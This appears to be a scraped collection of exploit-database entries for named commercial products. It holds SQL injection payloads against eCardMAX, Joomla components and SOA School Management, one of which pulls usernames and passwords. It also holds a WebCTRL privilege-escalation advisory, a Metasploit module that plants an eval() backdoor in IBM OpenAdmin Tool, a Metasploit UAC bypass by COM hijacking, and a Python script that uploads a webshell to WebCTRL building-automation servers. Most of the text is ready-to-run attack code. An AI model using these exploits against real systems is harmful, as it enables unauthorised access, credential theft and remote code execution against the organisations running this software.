# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/wedding.php?category=[SQL]&city=[SQL]
# 
# http://localhost/[PATH]/homeads.php?id=[SQL]
# 
# Etc...
# # # # #
HireHackking 
# # # # #
# Exploit Title: eCardMAX 10.5 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : https://www.ecardmax.com/
# Software Link: https://www.ecardmax.com/home/ecardmax/
# Demo: https://ecardmax.com/ecardmaxdemo/
# Version: 10.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# view-source:http://localhost/[PATH]/cards/sendcard/[SQL]
# 727+union+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x64656465--+-/0x496873616e53656e63616e
# 
# http://localhost/[PATH]/category/[SQL]
# 11'+aND(/*!22223SELECT*/+0x30783331+/*!22223FROM*/+(/*!22223SELECT*/+cOUNT(*),/*!22223CONCAT*/((/*!22223sELECT*/(/*!22223sELECT*/+/*!22223CONCAT*/(cAST(dATABASE()+aS+/*!22223cHAR*/),0x7e,0x496873616E53656e63616e))+/*!22223fROM*/+iNFORMATION_sCHEMA.tABLES+/*!22223wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!22223rAND*/(0)*2))x+/*!22223fROM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!22223aNd*/+''='/0x496873616e53656e63616e
# 
# http://localhost/[PATH]/invitation/[SQL]
# 15'+aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+''='/0x496873616e53656e63616e
# 
# Etc...
# # # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Zap Calendar Lite 4.3.4 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage: https://zcontent.net/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/zap-calendar-lite/
# Demo: http://demo.zapcalendar.com/
# Version: 4.3.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_zcalendar&view=plugin&name=rsvp&task=rsvpform&user=&eid=[SQL]
# 1++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)&format=raw
# 
# Etc..
# # # # #
HireHackking 
# # # # #
# Exploit Title: SOA School Management 3.0 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage : https://ynetinteractive.com/
# Software Link: http://codecanyon.net/item/soa-school-management-software-with-integrated-parents-students-portal/20435367?s_rank=3
# Demo: http://demo.ynetinteractive.com/soa/
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
# http://localhost/[PATH]/drivers/jquery/usersession_exam.php?id=[SQL]
# http://localhost/[PATH]/drivers/jquery/session_exam.php?id=[SQL]
# 1'+/*!44444union*/+/*!44444select*/+1,2,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),4,5--+-
# 1'+/*!44444union*/+/*!44444select*/+1,2,concat(username,0x3a,password),4,5+from+users--+-
# 
# http://localhost/[PATH]/Assignment.php?student_id=[SQL]
# 7'and+(select+0x31+from (select+count(*),concat((select(select concat(cast(database() as char),0x7e))+from information_schema.tables+where table_schema=database()+limit 0,1),floor(rand(0)*2))x from+information_schema.tables+group+by+x)a)+AND ''='
# 
# http://localhost/[PATH]/Fee.php?pay&student_id=7&fee_id=[SQL]
# 
# http://localhost/[PATH]/YearBook.php?session_id=[SQL]
# 
# http://localhost/[PATH]/Transaction.php?invoice=[SQL]
# 
# Etc...
# # # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Calendar Planner 1.0.1 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage: http://joomlathat.com/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/calendar-planner/
# Demo: http://demo.joomlathat.com/
# Version: 1.0.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php/component/calendarplanner/events?searchword=&option=com_calendarplanner&view=events&category_id=[SQL]
# 
# Etc..
# # # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component SP Movie Database 1.3 - SQL Injection
# Dork: N/A
# Date: 18.08.2017
# Vendor Homepage: http://joomshaper.com/
# Software Link: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/sp-movie-database/
# Demo: http://demo.joomshaper.com/2016/moview/
# Version: 1.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 	
# Proof of Concept:
# 
# http://localhost/[PATH]/index.php?option=com_spmoviedb&view=searchresults&searchword=[SQL]&type=movies&Itemid=523
# 
# Etc..
# # # # #
HireHackking 
Automated Logic WebCTRL 6.5 Insecure File Permissions Privilege Escalation


Vendor: Automated Logic Corporation
Product web page: http://www.automatedlogic.com
Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
                  ALC WebCTRL, SiteScan Web 6.1 and prior
                  ALC WebCTRL, i-Vu 6.0 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
                  ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior

Summary: WebCTRL®, Automated Logic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators to optimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need to keep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.

Desc: WebCTRL server/service suffers from an elevation of privileges vulnerability
which can be used by a simple authenticated user that can change the executable
file with a binary of choice. The vulnerability exist due to the improper permissions,
with the 'M' flag (Modify) or 'C' flag (Change) for 'Authenticated Users' group.
The application suffers from an unquoted search path issue as well impacting the service
'WebCTRL Service' for Windows deployed as part of WebCTRL server solution. This could
potentially allow an authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. A successful attempt would require the
local user to be able to insert their code in the system root path undetected by the
OS or other security applications where it could potentially be executed during
application startup or reboot. If successful, the local user’s code would execute
with the elevated privileges of the application.

Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5429
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5429.php

CVE ID: CVE-2017-9644
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9644


30.01.2017

---


sc qc "WebCTRL Service"

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Webctrl Service
TYPE : 20 WIN32_SHARE_PROCESS 
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WebCTRL6.0\WebCTRL Service.exe -run
LOAD_ORDER_GROUP : 
TAG : 0
DISPLAY_NAME : WebCTRL Service 6.0
DEPENDENCIES : 
SERVICE_START_NAME : LocalSystem


cacls "C:\WebCTRL6.0\WebCTRL Service.exe"

C:\WebCTRL6.0\WebCTRL Service.exe
  BUILTIN\Administrators:(ID)F 
  NT AUTHORITY\SYSTEM:(ID)F 
  BUILTIN\Users:(ID)R 
  NT AUTHORITY\Authenticated Users:(ID)C


cacls "C:\WebCTRL6.0\WebCTRL Server.exe"

C:\WebCTRL6.0\WebCTRL Server.exe
  BUILTIN\Administrators:(ID)F 
  NT AUTHORITY\SYSTEM:(ID)F 
  BUILTIN\Users:(ID)R 
  NT AUTHORITY\Authenticated Users:(ID)C
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include REXML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IBM OpenAdmin Tool SOAP welcomeServer PHP Code Execution',
      'Description'    => %q{
        This module exploits an unauthenticated remote PHP code execution
        vulnerability in IBM OpenAdmin Tool included with IBM Informix
        versions 11.5, 11.7, and 12.1.

        The 'welcomeServer' SOAP service does not properly validate user input
        in the 'new_home_page' parameter of the 'saveHomePage' method allowing
        arbitrary PHP code to be written to the config.php file. The config.php
        file is executed in most pages within the application, and accessible
        directly via the web root, resulting in code execution.

        This module has been tested successfully on IBM OpenAdmin Tool 3.14
        on Informix 12.10 Developer Edition (SUSE Linux 11) virtual appliance.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'SecuriTeam', # Discovery and exploit
          'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2017-1092'],
          ['EDB', '42091'],
          ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=swg22002897'],
          ['URL', 'https://blogs.securiteam.com/index.php/archives/3210'],
          ['URL', 'http://seclists.org/fulldisclosure/2017/May/105']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Privileged'     => false, # Privileged on Windows but not on *nix targets
      'Targets'        => [['Generic (PHP Payload)', {}]],
      'DisclosureDate' => 'May 30 2017',
      'DefaultTarget'  => 0))
    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The base path to IBM OpenAdmin Tool', '/openadmin' ])
      ]
    )
  end

  def set_home_page(homepage)
    xml = Document.new
    xml.add_element 'soapenv:Envelope', 'xmlns:xsi'     => 'http://www.w3.org/2001/XMLSchema-instance',
                                        'xmlns:xsd'     => 'http://www.w3.org/2001/XMLSchema',
                                        'xmlns:soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/',
                                        'xmlns:urn'     => 'urn:Welcome'
    xml.root.add_element 'soapenv:Header'
    xml.root.add_element 'soapenv:Body'
    body = xml.root.elements[2]
    body.add_element 'urn:saveHomePage', 'soapenv:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
    new_home_page = body.elements[1].add_element 'new_home_page', 'xsi:type' => 'xsd:string'
    new_home_page.text = homepage

    uri = normalize_uri target_uri.path, 'services', 'welcome', 'welcomeService.php'
    send_request_cgi 'method'  => 'POST',
                     'uri'     => uri,
                     'ctype'   => 'text/xml; charset=UTF-8',
                     'headers' => { 'SOAPAction' => 'urn:QBEAction' },
                     'data'    => xml.to_s
  end

  def check
    fingerprint = Rex::Text.rand_text_alpha(rand(10) + 6)
    res = set_home_page "\";##{fingerprint}"

    unless res
      vprint_status "#{peer} Connection failed"
      return CheckCode::Unknown
    end

    if res.code == 200 && res.body =~ %r{<ns1:saveHomePageResponse><return xsi:type="xsd:string">";##{fingerprint}</return>}
      return CheckCode::Detected
    end

    Msf::Exploit::CheckCode::Safe
  end

  def exploit
    cmd_param = Rex::Text.rand_text_alpha(rand(10) + 6)

    res = set_home_page "\";eval($_POST['#{cmd_param}']); #"

    unless res
      vprint_status "#{peer} Connection failed"
      return CheckCode::Unknown
    end

    if res.code == 200 && res.body =~ /<ns1:saveHomePageResponse><return xsi:type="xsd:string">";eval/
      print_good "#{peer} Wrote backdoor to config.php file successfully"
    else
      fail_with Failure::UnexpectedReply, "#{peer} Failed to backdoor config.php"
    end

    vprint_status "#{peer} Executing payload..."
    send_request_cgi({ 'method'    => 'POST',
                       'uri'       => normalize_uri(target_uri.path, 'conf', 'config.php'),
                       'vars_post' => { cmd_param => payload.encoded } }, 5)

    print_warning "#{peer} Replace the 'config.php' file with 'BAKconfig.php' to remove the backdoor"
  end
end
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Post::Windows::Priv
  include Post::Windows::Registry
  include Post::Windows::Runas
  include Exploit::FileDropper

  CLSID_PATH       = "HKCU\\Software\\Classes\\CLSID"
  DEFAULT_VAL_NAME = '' # This maps to "(Default)"

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)',
      'Description'   => %q{
        This module will bypass Windows UAC by creating COM handler registry entries in the
        HKCU hive. When certain high integrity processes are loaded, these registry entries
        are referenced resulting in the process loading user-controlled DLLs. These DLLs
        contain the payloads that result in elevated sessions. Registry key modifications
        are cleaned up after payload invocation.

        This module requires the architecture of the payload to match the OS, but the
        current low-privilege Meterpreter session architecture can be different. If
        specifying EXE::Custom your DLL should call ExitProcess() after starting your
        payload in a separate process.

        This module invokes the target binary via cmd.exe on the target. Therefore if
        cmd.exe access is restricted, this module will not run correctly.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [
          'Matt Nelson',    # UAC bypass discovery and research
          'b33f',           # UAC bypass discovery and research
          'OJ Reeves'       # MSF module
        ],
      'Platform'      => ['win'],
      'SessionTypes'  => ['meterpreter'],
      'Targets'       => [
          ['Automatic', {}]
      ],
      'DefaultTarget' => 0,
      'References'    => [
        [
          'URL', 'https://www.youtube.com/watch?v=3gz1QmiHhss',
          'URL', 'https://wikileaks.org/ciav7p1/cms/page_13763373.html',
          'URL', 'https://github.com/FuzzySecurity/Defcon25/Defcon25_UAC-0day-All-Day_v1.2.pdf',
        ]
      ],
      'DisclosureDate'=> 'Jan 01 1900'
    ))
  end

  def check
    if sysinfo['OS'] =~ /Windows (7|8|10|2008|2012|2016)/ && is_uac_enabled?
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    # Make sure we have a sane payload configuration
    if sysinfo['Architecture'] != payload_instance.arch.first
      fail_with(Failure::BadConfig, "#{payload_instance.arch.first} payload selected for #{sysinfo['Architecture']} system")
    end

    registry_view = REGISTRY_VIEW_NATIVE
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      registry_view = REGISTRY_VIEW_64_BIT
    end

    # Validate that we can actually do things before we bother
    # doing any more work
    check_permissions!

    case get_uac_level
      when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
        UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
        UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
        fail_with(Failure::NotVulnerable,
                  "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting..."
        )
      when UAC_DEFAULT
        print_good('UAC is set to Default')
        print_good('BypassUAC can bypass this setting, continuing...')
      when UAC_NO_PROMPT
        print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
        shell_execute_exe
        return
    end

    payload = generate_payload_dll({:dll_exitprocess => true})
    commspec = expand_path('%COMSPEC%')
    dll_name = expand_path("%TEMP%\\#{rand_text_alpha(8)}.dll")
    hijack = hijack_com(registry_view, dll_name)

    unless hijack && hijack[:cmd_path]
      fail_with(Failure::Unknown, 'Unable to hijack COM')
    end

    begin
      print_status("Targeting #{hijack[:name]} via #{hijack[:root_key]} ...")
      print_status("Uploading payload to #{dll_name} ...")
      write_file(dll_name, payload)
      register_file_for_cleanup(dll_name)

      print_status("Executing high integrity process ...")
      args = "/c #{expand_path(hijack[:cmd_path])}"
      args << " #{hijack[:cmd_args]}" if hijack[:cmd_args]

      # Launch the application from cmd.exe instead of directly so that we can
      # avoid the dreaded 740 error (elevation requried)
      client.sys.process.execute(commspec, args, {'Hidden' => true})

      # Wait a copule of seconds to give the payload a chance to fire before cleaning up
      Rex::sleep(5)

      handler(client)

    ensure
      print_status("Cleaining up registry ...")
      registry_deletekey(hijack[:root_key], registry_view)
    end
  end

  # TODO: Add more hijack points when they're known.
  # TODO: when more class IDs are found for individual hijackpoints
  # they can be added to the array of class IDs.
  @@hijack_points = [
    {
      name: 'Event Viewer',
      cmd_path: '%WINDIR%\System32\eventvwr.exe',
      class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
    },
    {
      name: 'Computer Managment',
      cmd_path: '%WINDIR%\System32\mmc.exe',
      cmd_args: 'CompMgmt.msc',
      class_ids: ['0A29FF9E-7F9C-4437-8B11-F424491E3931']
    }
  ]

  #
  # Perform the hijacking of COM class IDS. This function chooses a random
  # application target and a random class id associated with it before
  # modifying the registry.
  #
  def hijack_com(registry_view, dll_path)
    target = @@hijack_points.sample
    target_clsid = target[:class_ids].sample
    root_key = "#{CLSID_PATH}\\{#{target_clsid}}"
    inproc_key = "#{root_key}\\InProcServer32"
    shell_key = "#{root_key}\\ShellFolder"

    registry_createkey(root_key, registry_view)
    registry_createkey(inproc_key, registry_view)
    registry_createkey(shell_key, registry_view)

    registry_setvaldata(inproc_key, DEFAULT_VAL_NAME, dll_path, 'REG_SZ', registry_view)
    registry_setvaldata(inproc_key, 'ThreadingModel', 'Apartment', 'REG_SZ', registry_view)
    registry_setvaldata(inproc_key, 'LoadWithoutCOM', '', 'REG_SZ', registry_view)
    registry_setvaldata(shell_key, 'HideOnDesktop', '', 'REG_SZ', registry_view)
    registry_setvaldata(shell_key, 'Attributes', 0xf090013d, 'REG_DWORD', registry_view)

    {
      name:     target[:name],
      cmd_path: target[:cmd_path],
      cmd_args: target[:cmd_args],
      root_key: root_key
    }
  end

  def check_permissions!
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

    # Check if you are an admin
    vprint_status('Checking admin status...')
    admin_group = is_in_admin_group?

    unless check == Exploit::CheckCode::Appears
      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
    end

    unless is_in_admin_group?
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    print_status('UAC is Enabled, checking level...')
    if admin_group.nil?
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    else
      if admin_group
        print_good('Part of Administrators group! Continuing...')
      else
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
      end
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end
HireHackking 
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
#
# Automated Logic WebCTRL 6.5 Unrestricted File Upload Remote Code Execution
#
#
# Vendor: Automated Logic Corporation
# Product web page: http://www.automatedlogic.com
# Affected version: ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior
#                   ALC WebCTRL, SiteScan Web 6.1 and prior
#                   ALC WebCTRL, i-Vu 6.0 and prior
#                   ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior
#                   ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior
#
# Summary: WebCTRL®, Automated Logic's web-based building automation
# system, is known for its intuitive user interface and powerful integration
# capabilities. It allows building operators to optimize and manage
# all of their building systems - including HVAC, lighting, fire, elevators,
# and security - all within a single HVAC controls platform. It's everything
# they need to keep occupants comfortable, manage energy conservation measures,
# identify key operational problems, and validate the results.
#
# Desc: WebCTRL suffers from an authenticated arbitrary code execution
# vulnerability. The issue is caused due to the improper verification
# when uploading Add-on (.addons or .war) files using the uploadwarfile
# servlet. This can be exploited to execute arbitrary code by uploading
# a malicious web archive file that will run automatically and can be
# accessed from within the webroot directory. Additionaly, an improper
# authorization access control occurs when using the 'anonymous' user.
# By specification, the anonymous user should not have permissions or
# authorization to upload or install add-ons. In this case, when using
# the anonymous user, an attacker is still able to upload a malicious
# file via insecure direct object reference and execute arbitrary code.
# The anonymous user was removed from version 6.5 of WebCTRL.
#
# Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)
#            Apache-Coyote/1.1
#            Apache Tomcat/7.0.42
#            CJServer/1.1
#            Java/1.7.0_25-b17
#            Java HotSpot Server VM 23.25-b01
#            Ant 1.7.0
#            Axis 1.4
#            Trove 2.0.2
#            Xalan Java 2.4.1
#            Xerces-J 2.6.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5431
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5431.php
#
# ICS-CERT: https://ics-cert.us-cert.gov/advisories/ICSA-17-234-01
# CVE ID: CVE-2017-9650
# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9650
#
#
# 30.01.2017
#
#

import itertools
import mimetools
import mimetypes
import cookielib
import binascii
import urllib2
import urllib
import sys
import re
import os

from urllib2 import URLError
global bindata

__author__ = 'lqwrm'

piton = os.path.basename(sys.argv[0])

def bannerche():
  print '''
 @-------------------------------------------------@
 |                                                 |
 |        WebCTRL 6.5 Authenticated RCE PoC        |
 |               ID: ZSL-2017-5431                 |
 |       Copyleft (c) 2017, Zero Science Lab       |
 |                                                 |
 @-------------------------------------------------@
          '''
  if len(sys.argv) < 3:
    print '[+] Usage: '+piton+' <IP> <WAR FILE>'
    print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n'
    sys.exit()

bannerche()

host = sys.argv[1]
filename = sys.argv[2]

with open(filename, 'rb') as f:
    content = f.read()
hexo = binascii.hexlify(content)
bindata = binascii.unhexlify(hexo)

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)

print '[+] Probing target http://'+host

try:
  checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en')
except urllib2.HTTPError, errorzio:
  if errorzio.code == 404:
    print '[!] Error 001:'
    print '[-] Check your target!'
    print
    sys.exit()
except URLError, errorziocvaj:
  if errorziocvaj.reason:
    print '[!] Error 002:'
    print '[-] Check your target!'
    print
    sys.exit()

print '[+] Target seems OK.'
print '[+] Login please:'

print '''
Default username: Administrator, Anonymous
Default password: (blank), (blank)
'''

username = raw_input('[*] Enter username: ')
password = raw_input('[*] Enter password: ')

login_data = urllib.urlencode({'pass':password, 'name':username, 'touchscr':'false'})

opener.addheaders = [('User-agent', 'Thrizilla/33.9')]
login = opener.open('http://'+host+'/?language=en', login_data)
auth = login.read()

if re.search(r'productName = \'WebCTRL', auth):
  print '[+] Authenticated!'
  token = re.search('wbs=(.+?)&', auth).group(1)
  print '[+] Got wbs token: '+token
  cookie1, cookie2 = [str(c) for c in cj]
  cookie = cookie1[8:51]
  print '[+] Got cookie: '+cookie
else:
  print '[-] Incorrect username or password.'
  print
  sys.exit()

print '[+] Sending payload.'

class MultiPartForm(object):

    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
        return
    
    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary

    def add_field(self, name, value):
        self.form_fields.append((name, value))
        return

    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((fieldname, filename, mimetype, body))
        return
    
    def __str__(self):

        parts = []
        part_boundary = '--' + self.boundary
        
        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"' % name,
              '',
              value,
            ]
            for name, value in self.form_fields
            )
        
        parts.extend(
            [ part_boundary,
              'Content-Disposition: file; name="%s"; filename="%s"' % \
                 (field_name, filename),
              'Content-Type: %s' % content_type,
              '',
              body,
            ]
            for field_name, filename, content_type, body in self.files
            )
        
        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        flattened.append('')
        return '\r\n'.join(flattened)

if __name__ == '__main__':
    form = MultiPartForm()
    form.add_field('wbs', token)
    form.add_field('file"; filename="'+filename, bindata)
    request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile')
    request.add_header('User-agent', 'SCADA/8.0')
    body = str(form)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Cookie', cookie)
    request.add_header('Content-length', len(body))
    request.add_data(body)
    request.get_data()
    urllib2.urlopen(request).read()

print '[+] Payload uploaded.'
print '[+] Shell available at: http://'+host+'/'+filename[:-4]
print

sys.exit()